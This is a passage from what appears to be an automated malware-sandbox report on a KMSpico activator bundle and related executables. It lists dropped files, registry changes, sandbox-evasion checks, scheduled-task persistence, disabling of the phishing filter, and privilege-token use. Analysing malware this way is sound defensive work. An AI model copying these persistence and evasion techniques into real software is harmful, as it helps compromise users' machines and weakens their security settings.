Files\KMSpico\cert\kmscert2010\Groove\is-3RB47.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\OneNote\is-ATUVB.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\Visio\is-E8GFL.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\Enterprise\is-BJLUH.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW7\Professional\is-TU6HI.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW7\Professional\is-75BC1.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW81\Core\is-B134R.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\Word\is-Q6TRK.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\SkypeforBusiness\is-6ES1O.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\BusinessN\is-00SSM.tmp KMSpico.tmp File created C:\Program Files\KMSpico\is-CK7A5.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\Publisher\is-83NU3.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\PowerPoint\is-6IFMM.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\ProjectPro\is-RVHBD.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\Standard\is-092LJ.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\Enterprise\is-E444H.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW8\ProfessionalWMC\is-53EU7.tmp KMSpico.tmp File created C:\Program Files\KMSpico\driver\is-K0L30.tmp KMSpico.tmp File created C:\Program Files\KMSpico\is-5RKL8.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\InfoPath\is-9Q193.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\ProPlus\is-MQV1O.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\ProPlus\is-I2HN7.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\Publisher\is-OCDNP.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\Business\is-O0693.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\BusinessN\is-3IPV5.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW7\Embedded\is-ISDQ9.tmp KMSpico.tmp File created C:\Program Files\KMSpico\unins000.dat KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\OneNote\is-MQOVL.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\ProjectStd\is-2BCGL.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\PowerPoint\is-3I53M.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\Publisher\is-4448K.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\is-RMDME.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\Business\is-VCPGB.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW7\Embedded\is-C0JFJ.tmp KMSpico.tmp File created C:\Program Files\KMSpico\is-9VCIJ.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\Excel\is-98QPQ.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\OneNote\is-K7499.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\Excel\is-SUR8L.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\Outlook\is-1SSG5.tmp KMSpico.tmp -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SECOH-QAD.dll KMSELDI.exe File created C:\Windows\SECOH-QAD.exe KMSELDI.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\namez.job FC8EB13MXLKFC6SOSHM0CW5GA1.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp chrome.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 9784 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0006000000027489-35504.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh 8101ae6c.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh 8101ae6c.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 8872 8060 WerFault.exe 469 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FC8EB13MXLKFC6SOSHM0CW5GA1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8101ae6c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6ad67669e5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language utxikedhsa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 525ffce19b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UninsHs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZH66FT2SF3KZS55G4K6E7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BrokPyR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BrokPyR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexpress.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5be2288.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BrokPyR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hmcm0Oj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 235T1TS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BrokPyR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ynjrybyoa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language b9c645bc7c.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage b9c645bc7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 21d3425115.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GitcS6s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 23f282f58a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language namez.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hmcm0Oj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 235T1TS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 525ffce19b.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IPCJFu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ynjrybyoa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language core.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GitcS6s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IPCJFu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language utxikedhsa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KMSpico.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KMSpico.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 419748d64b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7796 PING.EXE 8240 PING.EXE 8552 PING.EXE 8788 PING.EXE 10720 PING.EXE 11556 PING.EXE 6720 PING.EXE 2320 PING.EXE 10996 PING.EXE 11052 PING.EXE 6808 PING.EXE 7556 PING.EXE 8112 PING.EXE 9128 PING.EXE 11912 PING.EXE 6992 PING.EXE 8068 PING.EXE 12988 PING.EXE 12544 PING.EXE 7600 PING.EXE 8352 PING.EXE 11692 PING.EXE 6876 PING.EXE 4460 PING.EXE 12032 PING.EXE 7036 PING.EXE 8940 PING.EXE 10868 PING.EXE 11872 PING.EXE 11644 PING.EXE 4728 PING.EXE 6864 PING.EXE 12092 PING.EXE 9324 PING.EXE 3700 PING.EXE 9564 PING.EXE 4464 PING.EXE 9488 PING.EXE 12156 PING.EXE 5768 PING.EXE 3124 PING.EXE 7724 PING.EXE 7640 PING.EXE 8456 PING.EXE 8640 PING.EXE 9428 PING.EXE 8024 PING.EXE 8680 PING.EXE 9036 PING.EXE 9084 PING.EXE 9636 PING.EXE 9788 PING.EXE 10316 PING.EXE 9156 PING.EXE 6700 PING.EXE 10600 PING.EXE 2912 PING.EXE 9696 PING.EXE 6772 PING.EXE 7412 PING.EXE 4520 PING.EXE 10160 PING.EXE 7164 PING.EXE 7220 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 36 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 10728 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 417 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 12084 taskkill.exe 7548 taskkill.exe 7640 taskkill.exe 7836 taskkill.exe 7908 taskkill.exe -
Modifies Control Panel 3 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\Desktop\PaintDesktopVersion = "0" KMSELDI.exe Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\Desktop\PaintDesktopVersion = "0" AutoPico.exe Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\Desktop\PaintDesktopVersion = "0" KMSELDI.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter KMSpico.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "0" KMSpico.tmp -
Modifies data under HKEY_USERS 18 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64 SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64\DiscoveredKeyManagementServiceIpAddress = "10.176.133.135" SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee\DiscoveredKeyManagementServiceIpAddress AutoPico.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64\DiscoveredKeyManagementServiceIpAddress AutoPico.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee\DiscoveredKeyManagementServiceIpAddress = "10.176.133.135" SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64\DiscoveredKeyManagementServiceIpAddress KMSELDI.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee\DiscoveredKeyManagementServiceIpAddress KMSELDI.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895896368841769" chrome.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT SppExtComObj.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings namez.exe Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings firefox.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 9036 PING.EXE 1832 PING.EXE 11916 PING.EXE 9220 PING.EXE 12156 PING.EXE 12244 PING.EXE 7724 PING.EXE 8024 PING.EXE 3428 PING.EXE 8992 PING.EXE 6276 PING.EXE 12092 PING.EXE 5700 PING.EXE 7164 PING.EXE 8456 PING.EXE 8352 PING.EXE 416 PING.EXE 9680 PING.EXE 6164 PING.EXE 5404 PING.EXE 9128 PING.EXE 10788 PING.EXE 10912 PING.EXE 13076 PING.EXE 9300 PING.EXE 6568 PING.EXE 7640 PING.EXE 8160 PING.EXE 8240 PING.EXE 8856 PING.EXE 10496 PING.EXE 3688 PING.EXE 7296 PING.EXE 7600 PING.EXE 3700 PING.EXE 9564 PING.EXE 11216 PING.EXE 12008 PING.EXE 11592 PING.EXE 2384 PING.EXE 9324 PING.EXE 9428 PING.EXE 8068 PING.EXE 10412 PING.EXE 11780 PING.EXE 5448 PING.EXE 12032 PING.EXE 9776 PING.EXE 6664 PING.EXE 7036 PING.EXE 5720 PING.EXE 12940 PING.EXE 6772 PING.EXE 4088 PING.EXE 12448 PING.EXE 10160 PING.EXE 12960 PING.EXE 11960 PING.EXE 6936 PING.EXE 7080 PING.EXE 7536 PING.EXE 8292 PING.EXE 11344 PING.EXE 11736 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5440 schtasks.exe 5624 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5224 random.exe 5224 random.exe 5224 random.exe 5224 random.exe 5224 random.exe 5224 random.exe 5224 random.exe 5224 random.exe 5224 random.exe 5224 random.exe 2840 MSBuild.exe 2840 MSBuild.exe 2840 MSBuild.exe 2840 MSBuild.exe 2840 MSBuild.exe 2840 MSBuild.exe 2840 MSBuild.exe 2840 MSBuild.exe 3752 MSBuild.exe 3752 MSBuild.exe 3752 MSBuild.exe 3752 MSBuild.exe 3752 MSBuild.exe 3752 MSBuild.exe 3752 MSBuild.exe 3752 MSBuild.exe 2696 Hmcm0Oj.exe 2696 Hmcm0Oj.exe 2756 powershell.exe 2756 powershell.exe 2756 powershell.exe 2696 Hmcm0Oj.exe 2696 Hmcm0Oj.exe 5448 taskmgr.exe 5448 taskmgr.exe 2696 Hmcm0Oj.exe 2696 Hmcm0Oj.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 2696 Hmcm0Oj.exe 2696 Hmcm0Oj.exe 2696 Hmcm0Oj.exe 2696 Hmcm0Oj.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 5448 taskmgr.exe 13152 21d3425115.exe 13152 21d3425115.exe 1320 MSBuild.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 9084 taskmgr.exe 10108 KMSELDI.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3244 235T1TS.exe 3244 235T1TS.exe 3244 235T1TS.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 12408 chrome.exe 8936 chrome.exe 8936 chrome.exe 8936 chrome.exe 12664 msedge.exe 12664 msedge.exe 7324 chrome.exe 7324 chrome.exe 7324 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeImpersonatePrivilege 5224 random.exe Token: SeImpersonatePrivilege 5224 random.exe Token: SeImpersonatePrivilege 2840 MSBuild.exe Token: SeImpersonatePrivilege 2840 MSBuild.exe Token: SeImpersonatePrivilege 3752 MSBuild.exe Token: SeImpersonatePrivilege 3752 MSBuild.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeImpersonatePrivilege 2696 Hmcm0Oj.exe Token: SeDebugPrivilege 5448 taskmgr.exe Token: SeSystemProfilePrivilege 5448 taskmgr.exe Token: SeCreateGlobalPrivilege 5448 taskmgr.exe Token: SeImpersonatePrivilege 2696 Hmcm0Oj.exe Token: SeIncreaseQuotaPrivilege 2756 powershell.exe Token: SeSecurityPrivilege 2756 powershell.exe Token: SeTakeOwnershipPrivilege 2756 powershell.exe Token: SeLoadDriverPrivilege 2756 powershell.exe Token: SeSystemProfilePrivilege 2756 powershell.exe Token: SeSystemtimePrivilege 2756 powershell.exe Token: SeProfSingleProcessPrivilege 2756 powershell.exe Token: SeIncBasePriorityPrivilege 2756 powershell.exe Token: SeCreatePagefilePrivilege 2756 powershell.exe Token: SeBackupPrivilege 2756 powershell.exe Token: SeRestorePrivilege 2756 powershell.exe Token: 